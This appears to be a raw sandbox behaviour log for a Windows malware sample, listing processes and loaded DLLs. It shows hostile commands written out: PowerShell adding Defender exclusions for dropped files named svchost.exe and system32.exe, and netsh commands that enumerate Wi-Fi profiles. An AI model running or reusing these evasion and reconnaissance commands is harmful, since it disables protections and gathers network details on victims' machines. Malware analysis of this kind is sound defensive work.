Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe'	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Users\user\AppData\Roaming\system32.exe "C:\Users\user\AppData\Roaming\system32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
